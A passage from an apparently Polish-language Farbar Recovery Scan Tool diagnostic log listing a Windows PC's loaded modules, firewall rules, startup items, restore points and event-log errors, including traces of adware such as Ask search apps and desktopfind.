2013-01-23 08:12 - 2013-01-23 08:12 - 00166968 _____ () C:\Program Files (x86)\MSI Afterburner\Bundle\OSDServer\RTSS.exe
2014-10-17 13:34 - 2014-10-17 13:34 - 00699704 _____ () C:\Program Files (x86)\AVG\AVG PC TuneUp\avgrepliba.dll
2015-03-17 23:16 - 2014-12-15 02:03 - 00241704 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\TodoBackupService.exe
2014-10-17 13:34 - 2014-10-17 13:34 - 00835896 _____ () C:\Program Files (x86)\AVG\AVG PC TuneUp\tulnga.dll
2016-09-14 04:20 - 2016-09-14 04:20 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick.2\qtquick2plugin.dll
2016-09-14 04:20 - 2016-09-14 04:20 - 00739840 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Controls\qtquickcontrolsplugin.dll
2016-09-14 04:20 - 2016-09-14 04:20 - 00014336 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Window.2\windowplugin.dll
2016-09-14 04:20 - 2016-09-14 04:20 - 00071168 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Layouts\qquicklayoutsplugin.dll
2016-09-14 04:20 - 2016-09-14 04:20 - 00011776 _____ () C:\Program Files\AMD\CNext\CNext\libEGL.dll
2016-09-14 04:20 - 2016-09-14 04:20 - 02013696 _____ () C:\Program Files\AMD\CNext\CNext\libGLESv2.dll
2016-09-14 04:20 - 2016-09-14 04:20 - 00191488 _____ () C:\Program Files\AMD\CNext\CNext\QtQuick\Dialogs\dialogplugin.dll
2014-05-13 09:15 - 2014-05-13 09:15 - 00027648 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\PEbiosinterface32.dll
2014-05-13 09:15 - 2013-05-07 09:45 - 00104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.01.02\ATKEX.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00098856 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\CodeLog.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00031272 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\CheckTool.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00017448 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\CompressFile.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00088616 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\TBGetRemoteNetInfo.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 01296424 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\libxml2.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00060968 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\zlib1.dll
2015-03-17 23:15 - 2015-03-14 12:53 - 00107560 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\ActivationOnline.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00077864 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\logsys.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00030248 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\DiskSearchImg.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00068136 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\MountImg.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00158248 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\ImgFile.dll
2015-03-17 23:15 - 2015-03-14 12:54 - 00281128 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\DsImgFile.dll
2015-03-17 23:15 - 2015-03-14 12:54 - 00072232 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\CheckImg.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00139816 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\vhdvmdk.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00037416 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\BootDriver.dll
2015-03-17 23:16 - 2015-03-14 12:54 - 00759848 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\ExImage.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00193064 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\EmailBackupSize.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00407080 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\AndroidImage.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00148008 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\EnumDisk.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00076840 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\FatLib.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00207912 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\NTFSLib.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00024616 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\GetDriverInfo.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00020520 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\CorrectMbr.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00032296 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\EnumTapeDevice.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00034856 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\TbTapeBrowse.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00064040 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\RegLib.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00022568 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\AccountManager.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00115752 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\NasOperator.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00194088 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\EmailBrowser.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00077864 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\CloudOperator.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00037928 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\ActiveOnline.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00135720 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\VMConfig.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00020008 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\AndroidDeviceManager.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00043048 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\TbDataSwap.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00096808 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\TBFireWall.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00353832 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\DeviceManager.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00027176 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\DeviceAdapter.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00137256 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\Device.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00146984 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\Partition.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00050216 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\FileSystemAnalyser.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00061992 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\FATFileSystemAnalyser.dll
2015-03-17 23:15 - 2014-12-15 01:53 - 00089640 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\Common.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00056360 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\NTFSFileSystemAnalyser.dll
2012-11-30 12:24 - 2012-11-30 12:24 - 00061440 _____ () C:\Program Files (x86)\MSI Afterburner\Bundle\OSDServer\RTFC.dll
2012-11-30 12:26 - 2012-11-30 12:26 - 00147456 _____ () C:\Program Files (x86)\MSI Afterburner\Bundle\OSDServer\RTUI.dll
2012-11-30 12:48 - 2012-11-30 12:48 - 00061440 _____ () C:\Program Files (x86)\MSI Afterburner\Bundle\OSDServer\RTMUI.dll
2011-04-30 21:04 - 2011-04-30 21:04 - 00013312 _____ () C:\Program Files (x86)\MSI Afterburner\Bundle\OSDServer\RTTSH.dll
2012-11-30 12:45 - 2012-11-30 12:45 - 00122880 _____ () C:\Program Files (x86)\MSI Afterburner\Bundle\OSDServer\RTSSHooks.dll
2015-03-17 23:16 - 2014-12-15 01:53 - 00223784 _____ () C:\Program Files (x86)\EaseUS\Todo Backup\bin\SmartBackup.dll
2017-04-04 20:59 - 2017-04-04 20:59 - 00170216 _____ () C:\Program Files\AVAST Software\Avast\JsonRpcServer.dll
2016-09-26 14:14 - 2016-09-26 14:14 - 48936448 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll
2017-04-04 20:59 - 2017-04-04 20:59 - 00176480 _____ () C:\Program Files\AVAST Software\Avast\event_routing_rpc.dll
2017-04-04 20:58 - 2017-04-04 20:58 - 00293936 _____ () C:\Program Files\AVAST Software\Avast\gaming_mode_ui.dll
2017-04-04 20:59 - 2017-04-04 20:59 - 00653520 _____ () C:\Program Files\AVAST Software\Avast\ffl2.dll
2014-09-03 12:03 - 2014-09-03 12:03 - 01241560 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\ACE.dll
2017-04-04 09:05 - 2017-03-29 04:04 - 02187096 _____ () C:\Program Files (x86)\Google\Chrome\Application\57.0.2987.133\libglesv2.dll
2017-04-04 09:05 - 2017-03-29 04:04 - 00086360 _____ () C:\Program Files (x86)\Google\Chrome\Application\57.0.2987.133\libegl.dll

==================== Alternate Data Streams (filtrowane) =========

(Załączenie wejścia w fixlist spowoduje usunięcie strumienia ADS.)


==================== Tryb awaryjny (filtrowane) ===================

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Wartość "AlternateShell" zostanie przywrócona.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"

==================== PowiÄ…zania plikĂłw (filtrowane) ===============

(Załączenie wejścia w fixlist spowoduje usunięcie obiektu z rejestru lub przywrócenie jego domyślnej postaci.)


==================== Internet Explorer - Witryny zaufane i z ograniczeniami ===============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru.)


==================== Hosts - zawartość: ===============================

(UĹĽycie dyrektywy Hosts: w fixlist spowoduje reset pliku Hosts.)

2013-08-22 15:25 - 2017-04-24 13:40 - 00000035 ____A C:\Windows\system32\Drivers\etc\hosts


==================== Inne obszary ============================

(Obecnie brak automatycznej naprawy dla tej sekcji.)

HKU\S-1-5-21-1070030570-2694662635-206350218-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\web\wallpaper\Windows\img0.jpg
DNS Servers: 192.168.0.1 - 8.8.8.8
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Zapora systemu Windows [funkcja włączona]

==================== MSCONFIG/TASK MANAGER - Wyłączone elementy ==

HKLM\...\StartupApproved\StartupFolder: => "McAfee Security Scan Plus.lnk"
HKLM\...\StartupApproved\Run32: => "Device Detector"
HKLM\...\StartupApproved\Run32: => "Raptr"
HKLM\...\StartupApproved\Run32: => "EaseUS EPM tray"
HKLM\...\StartupApproved\Run32: => "Smart File Advisor"
HKLM\...\StartupApproved\Run32: => "SFAUpdater"
HKLM\...\StartupApproved\Run32: => "boincmgr"
HKLM\...\StartupApproved\Run32: => "Dropbox"
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\StartupApproved\StartupFolder: => "MyPC Backup.lnk"
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\StartupApproved\StartupFolder: => "Dropbox.lnk"
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\StartupApproved\Run: => "GG"
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\StartupApproved\Run: => "Skype"
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\StartupApproved\Run: => "Tlen.pl"
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\StartupApproved\Run: => "CCleaner Monitoring"
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\StartupApproved\Run: => "DAEMON Tools Lite"
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\StartupApproved\Run: => "Dropbox Update"
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\StartupApproved\Run: => "AlcoholAutomount"
HKU\S-1-5-21-1070030570-2694662635-206350218-1001\...\StartupApproved\Run: => "IPLA!"

==================== Reguły Zapory systemu Windows (filtrowane) ===============

(Załączenie wejścia w fixlist spowoduje jego usunięcie z rejestru. Powiązany plik nie zostanie przeniesiony, o ile nie zostanie załączony z osobna.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{EBBABBE5-D68C-4D8A-8420-303B9E729363}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{325314E0-16EC-4632-AF92-5E1AF332B795}] => (Allow) F:\Winamp\winamp.exe
FirewallRules: [{03F7D6F0-0BF8-4E34-B133-CB1A196A5415}] => (Allow) F:\Winamp\winamp.exe
FirewallRules: [{771584C0-D2CA-4E8D-8FEC-485DC16835E8}] => (Allow) C:\Program Files (x86)\EaseUS\Todo Backup\bin\TbService.exe
FirewallRules: [{262EFE13-0DC1-4C65-97E2-A03D7040A3F0}] => (Allow) C:\Program Files (x86)\EaseUS\Todo Backup\bin\TbService.exe
FirewallRules: [{BB1B02B1-43FC-4B14-A55E-BC3088454A4A}] => (Allow) C:\Program Files (x86)\EaseUS\Todo Backup\bin\TBConsoleUI.exe
FirewallRules: [{E90A69A1-2860-408C-988D-927B9BB654DB}] => (Allow) C:\Program Files (x86)\EaseUS\Todo Backup\bin\TBConsoleUI.exe
FirewallRules: [{D62BA8F0-57E6-443B-807E-8F7F01227D66}] => (Allow) C:\Program Files (x86)\EaseUS\Todo Backup\bin\TodoBackupService.exe
FirewallRules: [{5067C1F1-DCA0-4294-9470-2E35309C24EC}] => (Allow) C:\Program Files (x86)\EaseUS\Todo Backup\bin\TodoBackupService.exe
FirewallRules: [{2B8C5D5D-069F-4EC3-A659-237965F6F73C}] => (Allow) C:\Program Files (x86)\EaseUS\Todo Backup\bin\Agent.exe
FirewallRules: [{E3C93929-D9EB-473C-B4B6-B8C1A5DA565D}] => (Allow) C:\Program Files (x86)\EaseUS\Todo Backup\bin\TodoBackupService.exe
FirewallRules: [{B44C8283-9DD7-4BEC-BDDB-6A9BF9C89E4B}] => (Allow) C:\Program Files (x86)\EaseUS\Todo Backup\bin\TodoBackupService.exe
FirewallRules: [TCP Query User{6E21CD9A-26DB-4299-B058-A168996A4930}F:\tlen7\tlen7.exe] => (Block) F:\tlen7\tlen7.exe
FirewallRules: [UDP Query User{7D468A42-D223-4474-B6CB-E941D07AAF93}F:\tlen7\tlen7.exe] => (Block) F:\tlen7\tlen7.exe
FirewallRules: [TCP Query User{4F09B8E0-F2A5-48EA-8EFB-9666396D6E24}C:\users\adam\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\adam\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [UDP Query User{53B3DA54-4886-4FAB-891F-C59A473061A8}C:\users\adam\appdata\roaming\dropbox\bin\dropbox.exe] => (Block) C:\users\adam\appdata\roaming\dropbox\bin\dropbox.exe
FirewallRules: [TCP Query User{193E00E6-9341-4ABD-9B7D-85C0A9178EA9}C:\program files (x86)\sopcast\sopcast.exe] => (Allow) C:\program files (x86)\sopcast\sopcast.exe
FirewallRules: [UDP Query User{A5AF745D-3E92-4B5C-BCE7-CEA694F233D2}C:\program files (x86)\sopcast\sopcast.exe] => (Allow) C:\program files (x86)\sopcast\sopcast.exe
FirewallRules: [TCP Query User{877869B7-2EDA-4DEB-9AF2-134921CDD2BA}C:\program files (x86)\mirc\mirc.exe] => (Allow) C:\program files (x86)\mirc\mirc.exe
FirewallRules: [UDP Query User{B8DB2278-40DE-4520-BB7D-CF73FE2AB72D}C:\program files (x86)\mirc\mirc.exe] => (Allow) C:\program files (x86)\mirc\mirc.exe
FirewallRules: [TCP Query User{05FF2CB4-4A39-4714-B9E7-017BC5EFAD58}F:\pro evolution soccer 2015\pes2015.exe] => (Allow) F:\pro evolution soccer 2015\pes2015.exe
FirewallRules: [UDP Query User{E1C9DD4C-2D1E-44ED-8DFD-C835A2BE635E}F:\pro evolution soccer 2015\pes2015.exe] => (Allow) F:\pro evolution soccer 2015\pes2015.exe
FirewallRules: [TCP Query User{54BC3699-D5AA-4A31-9AB0-213F89C0F58C}C:\users\adam\desktop\mirc.exe] => (Allow) C:\users\adam\desktop\mirc.exe
FirewallRules: [UDP Query User{4FFA3B8D-DC50-4B96-8756-D9BA4AA43B61}C:\users\adam\desktop\mirc.exe] => (Allow) C:\users\adam\desktop\mirc.exe
FirewallRules: [{B2D47BEA-2F9E-410E-B6AF-94035B0BEA77}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{23B5138E-21DE-4BD1-B9BD-0B409A767FEB}] => (Allow) C:\Program Files (x86)\Raptr\raptr.exe
FirewallRules: [{0C98439B-7596-47C2-8519-41CE3CDD6B13}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{158AB578-BD13-4DE4-8FF5-3CE97907E011}] => (Allow) C:\Program Files (x86)\Raptr\raptr_im.exe
FirewallRules: [{C184763A-666C-42B7-8F82-D451CD5B265A}] => (Allow) C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
FirewallRules: [{4802F74E-4E74-4C91-AABC-BC0E87B8ECC6}] => (Allow) C:\Program Files\AVAST Software\Avast\ng\vbox\aswFe.exe
FirewallRules: [{92657373-B5E0-4FDE-8451-A8ECBCE38C5B}] => (Allow) C:\Users\Adam\AppData\Roaming\ACEStream\engine\ace_engine.exe
FirewallRules: [{61B2273F-4F6D-4D33-B814-3511975766F9}] => (Allow) C:\Users\Adam\AppData\Roaming\ACEStream\engine\ace_engine.exe
FirewallRules: [{73518430-4B83-4489-9CDA-B3D7461ED607}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.590_0\SZBrowser.exe
FirewallRules: [TCP Query User{9D787771-E338-4BAB-8A85-2B71161CAF76}C:\users\adam\appdata\roaming\octoshape\octoshape streaming services\infinitemediaacceleration.exe] => (Allow) C:\users\adam\appdata\roaming\octoshape\octoshape streaming services\infinitemediaacceleration.exe
FirewallRules: [UDP Query User{4EE77434-A56F-496F-BED4-D8958E47D7A2}C:\users\adam\appdata\roaming\octoshape\octoshape streaming services\infinitemediaacceleration.exe] => (Allow) C:\users\adam\appdata\roaming\octoshape\octoshape streaming services\infinitemediaacceleration.exe
FirewallRules: [{2C22CD0C-A50C-4F39-AC45-AF0DA66196A7}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{BC35CE9E-4D96-4B5F-A8BB-D6079AD556F3}] => (Allow) C:\Program Files\AVAST Software\SZBrowser\3.55.2393.596\SZBrowser.exe
FirewallRules: [TCP Query User{D89F6509-DFB3-44F8-AC4D-0F4344665175}C:\users\adam\appdata\roaming\acestream\engine\ace_engine.exe] => (Block) C:\users\adam\appdata\roaming\acestream\engine\ace_engine.exe
FirewallRules: [UDP Query User{15FD8BF2-A41D-4CB2-93E9-187F5803419E}C:\users\adam\appdata\roaming\acestream\engine\ace_engine.exe] => (Block) C:\users\adam\appdata\roaming\acestream\engine\ace_engine.exe
FirewallRules: [{7878A59F-637A-4176-8A1A-F065B7E6A7EA}] => (Allow) C:\Program Files (x86)\Dropbox\Client\Dropbox.exe
FirewallRules: [{BC15C403-515B-4FA8-B9C1-A39AF2540D0F}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{3E68DC6F-3F08-4908-95DB-6F555ACA88E8}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe

==================== Punkty Przywracania systemu =========================

06-04-2017 11:46:14 Zaplanowany punkt kontrolny
14-04-2017 10:44:45 Zaplanowany punkt kontrolny
22-04-2017 17:16:38 Zaplanowany punkt kontrolny

==================== Wadliwe urządzenia w Menedżerze urządzeń =============


==================== Błędy w Dzienniku zdarzeń: =========================

Dziennik Aplikacja:
==================
Error: (04/22/2017 11:40:46 PM) (Source: MsiInstaller) (EventID: 11316) (User: KUTYLA)
Description: Product: Shopping App by Ask -- Error 1316. Określone konto już istnieje.

Error: (04/22/2017 11:40:29 PM) (Source: MsiInstaller) (EventID: 11316) (User: KUTYLA)
Description: Product: Search App by Ask -- Error 1316. Określone konto już istnieje.

Error: (04/22/2017 11:33:46 PM) (Source: MsiInstaller) (EventID: 10005) (User: KUTYLA)
Description: Product: Search App by Ask -- Error 25001. The following applications must be closed before continuing the uninstall:

Google Chrome

Error: (04/21/2017 10:52:26 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: adwcleaner_6.045.exe, wersja: 6.0.4.5, sygnatura czasowa: 0x58da8d8e
Nazwa modułu powodującego błąd: adwcleaner_6.045.exe, wersja: 6.0.4.5, sygnatura czasowa: 0x58da8d8e
Kod wyjÄ…tku: 0xc0000005
Przesunięcie błędu: 0x00020fea
Identyfikator procesu powodującego błąd: 0x1104
Godzina uruchomienia aplikacji powodującej błąd: 0x01d2ba7a8c1165df
Ścieżka aplikacji powodującej błąd: F:\wiro\adwcleaner_6.045.exe
Ścieżka modułu powodującego błąd: F:\wiro\adwcleaner_6.045.exe
Identyfikator raportu: d732504f-266f-11e7-8345-d8cb8a1d695b
Pełna nazwa pakietu powodującego błąd:
Identyfikator aplikacji względem pakietu powodującego błąd:

Error: (04/21/2017 09:23:39 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: desktop254.exe, wersja: 1.0.0.10, sygnatura czasowa: 0x56e96567
Nazwa modułu powodującego błąd: desktop254.exe, wersja: 1.0.0.10, sygnatura czasowa: 0x56e96567
Kod wyjÄ…tku: 0xc0000409
Przesunięcie błędu: 0x00013ce7
Identyfikator procesu powodującego błąd: 0x6d8
Godzina uruchomienia aplikacji powodującej błąd: 0x01d2ba6fcb2414e5
Ścieżka aplikacji powodującej błąd: C:\ProgramData\desktopfind\desktop254.exe
Ścieżka modułu powodującego błąd: C:\ProgramData\desktopfind\desktop254.exe
Identyfikator raportu: 7063d5a1-2663-11e7-8345-d8cb8a1d695b
Pełna nazwa pakietu powodującego błąd:
Identyfikator aplikacji względem pakietu powodującego błąd:

Error: (04/20/2017 02:51:57 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Program IEXPLORE.EXE w wersji 11.0.9600.18124 przestał współpracować z systemem Windows i został zamknięty. Aby sprawdzić, czy jest dostępnych więcej informacji na temat tego problemu, sprawdź historię problemu w aplecie Centrum akcji w Panelu sterowania.

Identyfikator procesu: 1b2c

Godzina rozpoczęcia: 01d2b9d4bfb684cf

Godzina zakończenia: 7

ĹšcieĹĽka aplikacji: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Identyfikator raportu: 20b627c8-25c8-11e7-8344-d8cb8a1d695b

Pełna nazwa pakietu powodującego błąd:

Identyfikator aplikacji względem pakietu powodującego błąd:

Error: (04/20/2017 02:18:09 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: desktop254.exe, wersja: 1.0.0.10, sygnatura czasowa: 0x56e96567
Nazwa modułu powodującego błąd: desktop254.exe, wersja: 1.0.0.10, sygnatura czasowa: 0x56e96567
Kod wyjÄ…tku: 0xc0000409
Przesunięcie błędu: 0x00013ce7
Identyfikator procesu powodującego błąd: 0x748
Godzina uruchomienia aplikacji powodującej błąd: 0x01d2b9cfe11cdac3
Ścieżka aplikacji powodującej błąd: C:\ProgramData\desktopfind\desktop254.exe
Ścieżka modułu powodującego błąd: C:\ProgramData\desktopfind\desktop254.exe
Identyfikator raportu: 6a2281ac-25c3-11e7-8344-d8cb8a1d695b
Pełna nazwa pakietu powodującego błąd:
Identyfikator aplikacji względem pakietu powodującego błąd:

Error: (04/18/2017 10:11:50 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: desktop254.exe, wersja: 1.0.0.10, sygnatura czasowa: 0x56e96567
Nazwa modułu powodującego błąd: desktop254.exe, wersja: 1.0.0.10, sygnatura czasowa: 0x56e96567
Kod wyjÄ…tku: 0xc0000409
Przesunięcie błędu: 0x00013ce7
Identyfikator procesu powodującego błąd: 0x12c
Godzina uruchomienia aplikacji powodującej błąd: 0x01d2b87fa421b580
Ścieżka aplikacji powodującej błąd: C:\ProgramData\desktopfind\desktop254.exe
Ścieżka modułu powodującego błąd: C:\ProgramData\desktopfind\desktop254.exe
Identyfikator raportu: 4138dfb7-2473-11e7-8343-d8cb8a1d695b
Pełna nazwa pakietu powodującego błąd:
Identyfikator aplikacji względem pakietu powodującego błąd:

Error: (04/17/2017 04:38:07 PM) (Source: ATIeRecord) (EventID: 16390) (User: )
Description: ATI EEU waiting for an event has failed

Error: (04/17/2017 03:13:26 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Nazwa aplikacji powodującej błąd: chrome.exe, wersja: 57.0.2987.133, sygnatura czasowa: 0x58dae36d
Nazwa modułu powodującego błąd: ntdll.dll, wersja: 6.3.9600.18146, sygnatura czasowa: 0x5650afd4
Kod wyjÄ…tku: 0xc0000018
Przesunięcie błędu: 0x0009d572
Identyfikator procesu powodującego błąd: 0x159c
Godzina uruchomienia aplikacji powodującej błąd: 0x01d2b77c65f4b53a
Ścieżka aplikacji powodującej błąd: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Ścieżka modułu powodującego błąd: C:\Windows\SYSTEM32\ntdll.dll
Identyfikator raportu: a3b4b549-236f-11e7-8342-d8cb8a1d695b
Pełna nazwa pakietu powodującego błąd:
Identyfikator aplikacji względem pakietu powodującego błąd:


Dziennik System:
=============
Error: (04/24/2017 01:43:02 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \SystemRoot\SysWow64\drivers\pfc.sys

Error: (04/24/2017 01:42:24 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Usługa Wstępne ładowanie do pamięci zakończyła działanie; wystąpił następujący błąd:
Usługa nie została uruchomiona.

Error: (04/22/2017 11:44:18 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Usługa Apple Notifications Service zakończyła działanie; wystąpił następujący błąd:
Nie można odnaleźć określonego modułu.

Error: (04/22/2017 11:42:01 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Nie można uruchomić usługi McAfee Service Controller z powodu następującego błędu:
Nie można odnaleźć określonego pliku.

Error: (04/22/2017 11:41:51 PM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \SystemRoot\SysWow64\drivers\pfc.sys

Error: (04/21/2017 11:02:48 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Usługa Apple Notifications Service zakończyła działanie; wystąpił następujący błąd:
Nie można odnaleźć określonego modułu.

Error: (04/21/2017 11:00:34 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Nie można uruchomić usługi McAfee Service Controller z powodu następującego błędu:
Nie można odnaleźć określonego pliku.

Error: (04/21/2017 11:00:23 AM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \SystemRoot\SysWow64\drivers\pfc.sys

Error: (04/21/2017 10:58:41 AM) (Source: Service Control Manager) (EventID: 7032) (User: )
Description: Menedżer sterowania usługami próbował podjąć akcję korekcyjną (Uruchom usługę ponownie) po nieoczekiwanym zakończeniu usługi Windows Search, ale ta akcja nie powiodła się przy następującym błędzie:
Jedno wystąpienie usługi już działa.
.

Error: (04/21/2017 10:58:12 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: Usługa Dysk wirtualny niespodziewanie zakończyła pracę. Wystąpiło to razy: 1. W przeciągu 60000 milisekund zostanie podjęta następująca czynność korekcyjna: Uruchom usługę ponownie.


CodeIntegrity:
===================================
  Date: 2017-04-21 10:35:27.587
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-21 09:32:20.867
  Description: Code Integrity determined that a process (\Device\HarddiskVolume2\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume2\Program Files (x86)\Elex-tech\YAC\iSafeSrvMon64.dll that did not meet the Windows signing level requirements.

  Date: 2017-04-21 09:25:08.869
